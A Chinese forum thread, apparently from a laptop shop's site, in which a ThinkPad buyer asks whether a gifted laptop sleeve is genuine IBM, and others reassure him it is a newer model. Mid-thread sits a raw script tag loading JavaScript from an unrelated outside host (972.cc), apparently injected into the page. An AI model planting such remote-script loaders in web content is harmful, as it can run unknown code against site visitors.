开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

给我的是IBM原装内胆包么??

我是3.19号购的机。
购机时,对赠品的考虑是:别的小东西都不要,就想要一个原装的内胆包!!!(B套餐)
当时并没有注意到翔意的网站上有赠品的照片。

这两天看我的内胆包,总觉得做工不太象原装的,边上已经有点要开线了。
上翔意网站一看,竟和论坛中的照片不一样????

请斑竹解答我疑惑,是不是发货时搞错了??

翔意网站上的照片

翔意网站上的照片

我的内胆包

我的内胆包
。。。。。。。。。。。。。。。。哪个拉链的是05款,这个市06最新款。。。你可以去网上艘艘看就知道了。。。。

oem的能有这个质量吗?
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

可是我的内胆包有一个地方开线了,还以为是oem的,555555555555555
如果没有线头那简直太神了。
我的内胆包和你的一样原装的没错,当时我比较了一下原装的和OEM的手感确实不一样
OK,谢了,是我多虑了
希望我买的时候能选个好的
应该不会错的
我觉得这个不带拉链的好!很方便
不带拉链的好,因为拉链有可能划伤本